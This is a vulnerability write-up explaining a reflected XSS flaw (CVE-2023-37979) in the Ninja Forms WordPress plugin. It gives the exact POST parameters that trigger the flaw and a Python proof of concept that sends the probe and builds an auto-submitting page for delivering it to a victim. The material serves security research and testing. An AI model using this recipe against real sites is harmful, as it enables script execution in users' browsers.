CVE-2023-37979: WordPress Authenticated XSS in Ninja-forms Plugin
CVE ID | CVSS Score | Discovered | Affected Plugin | Vendor | Vulnerability Type |
---|---|---|---|---|---|
CVE-2023-37979 | | 27/07/2023 | Ninja Forms | WordPress | Reflected XSS |
Ninja Forms WordPress plugin
The Ninja Forms plugin is a popular form builder for WordPress sites, with over 800,000 active installations. It is affected by a reflected Cross-Site Scripting (XSS) vulnerability, which this write-up walks through.
Let's Exploit
How Does the Exploit Work?
The exploit targets the request that the Ninja Forms plugin sends to `/wp-admin/admin-ajax.php`. Among the parameters in that request is `action`; when `action` is set to `nf_batch_process`, the plugin runs the batch-processing handler, and that handler contains the code path that leads to the Cross-Site Scripting (XSS). Here is how that path works.

In the code, a condition checks two things: the request method must be POST, and the request must carry a parameter called `method_override`. A POST request that includes `method_override` lets the client name the method of the handler that should process it, which opens up code paths the normal plugin flow would never expose directly to a client.
Following the `action` parameter to `nf_batch_process` leads to `includes\AJAX\REST\BatchProcess.php` and its `get_request_data` function. Inside it, another `if` condition checks whether the request contains a `data` parameter. If it does, the function creates a `data` key in the `$request_data` array and assigns the raw value of the `data` parameter to it, without sanitizing or validating it. Attacker-controlled input therefore enters the handler's data structure unchanged.
In `includes\Abstracts\Controller.php`, the `_respond` function performs a few checks. One of them ensures that `data` is not empty; the value then has to pass a series of `if` conditions, after which the function places everything into the `response` variable that is sent back to the client.
The problem is that the `data` value filled in by `includes\AJAX\REST\BatchProcess.php` is the unsanitized one. It can therefore contain arbitrary markup, such as an XSS payload, and a malicious user who sends such data to the `nf_batch_process` action gets it echoed back in the response. That is the reflected XSS.
Putting this together, the XSS in the Ninja Forms WordPress plugin is triggered as follows:

- Send a POST request to the `/wp-admin/admin-ajax.php` endpoint.
- Set the `action` parameter to `nf_batch_process`.
- Include the `method_override` parameter and set it to `_respond`.
- Add the `data` parameter and set its value to the XSS payload.
The server's response contains the payload verbatim and is served with a `text/html` content type, so the browser parses it as HTML and executes the embedded script. Because the vulnerable code path only runs on POST requests, the attack cannot be delivered as a plain link: the victim has to be lured to an attacker-controlled page that submits the request from their browser. When an authenticated user loads such a page, the payload runs in their browser in the origin of the WordPress site.
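As an added example (not the original post's exploit and not Ninja Forms code), the following Python script assembles the request described above, classifies a response the way a tester would before calling it exploitable, and generates the POST delivery page that the write-up's "malicious page" implies. The target `https://target.example`, the harmless `<xss-probe>` marker tag and the two sample responses are constructed for illustration; the auto-submitting form is a standard delivery technique assumed here, not something the post describes.

```python
"""Offline PoC helper for the nf_batch_process reflected XSS described above.
Added example: not the original post's exploit and not Ninja Forms code. The
target URL, the probe tag and the sample responses are constructed."""
import html
import secrets
import urllib.request
from urllib.parse import urlencode, urljoin

AJAX_PATH = "/wp-admin/admin-ajax.php"


def build_probe(base_url, marker=None):
    """Assemble the POST request from the write-up.

    `action` selects the batch-process handler, `method_override` makes it
    call `_respond` directly, and `data` is the value that comes back
    unsanitized. The probe is a harmless custom tag carrying a random marker:
    it has no quotes or slashes, so it survives JSON encoding unchanged and
    proves reflection without executing anything."""
    marker = marker or secrets.token_hex(8)
    payload = f"<xss-probe data-m={marker}>"
    fields = {"action": "nf_batch_process", "method_override": "_respond", "data": payload}
    return {
        "url": urljoin(base_url, AJAX_PATH),
        "fields": fields,
        "body": urlencode(fields),
        "payload": payload,
    }


def classify_response(status, content_type, body, payload):
    """Decide what the reflection means for a browser.

    Returns 'not_reflected', 'reflected_escaped', 'reflected_non_html' or
    'exploitable'. Only the last one is the bug: the payload comes back
    verbatim and the response is served as text/html, so the browser parses
    it as markup. A JSON content type or HTML-escaped output is not it."""
    if payload not in body:
        if html.escape(payload, quote=True) in body:
            return "reflected_escaped"
        return "not_reflected"
    media_type = content_type.split(";", 1)[0].strip().lower()
    if status == 200 and media_type == "text/html":
        return "exploitable"
    return "reflected_non_html"


def delivery_page(probe):
    """The code path only fires on POST, so a plain link cannot deliver this.
    An auto-submitting form (assumed standard CSRF-style delivery) hosted on
    an attacker page makes the victim's browser POST the probe to the target
    and render the reflected reply."""
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in probe["fields"].items()
    )
    return (
        "<!doctype html>\n<html><body>\n"
        f'  <form id="f" method="post" action="{html.escape(probe["url"], quote=True)}">\n'
        f"{inputs}\n  </form>\n"
        "  <script>document.getElementById('f').submit();</script>\n"
        "</body></html>\n"
    )


def send_probe(probe, timeout=10):
    """Send the probe for real; only used from __main__, the checks stay offline."""
    req = urllib.request.Request(probe["url"], data=probe["body"].encode(), method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.headers.get("Content-Type", ""), resp.read().decode(errors="replace")


# Constructed sample responses, not captured from a real site.
PROBE = build_probe("https://target.example", marker="deadbeefcafef00d")
VULNERABLE_REPLY = '{"data":"<xss-probe data-m=deadbeefcafef00d>"}'
ESCAPED_REPLY = '{"data":"&lt;xss-probe data-m=deadbeefcafef00d&gt;"}'

if __name__ == "__main__":
    print(PROBE["body"])
    print(classify_response(200, "text/html; charset=UTF-8", VULNERABLE_REPLY, PROBE["payload"]))
    print(classify_response(200, "application/json", VULNERABLE_REPLY, PROBE["payload"]))
    print(classify_response(200, "text/html", ESCAPED_REPLY, PROBE["payload"]))
    print(delivery_page(PROBE))
```

Against a real target you would call `send_probe(build_probe(url))` and pass the returned triple to `classify_response`; only `exploitable` confirms the behaviour the write-up describes, since the same reflected string under `application/json` or with `<` and `>` escaped is not rendered as markup.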
Exploit for CVE-2023-37979
If you are looking for an exploit for CVE-2023-37979, it can be downloaded from the provided link: CVE-2023-37979. Note that using exploits without authorization may be illegal and unethical; use such tools responsibly and only against systems you own or have explicit permission to test.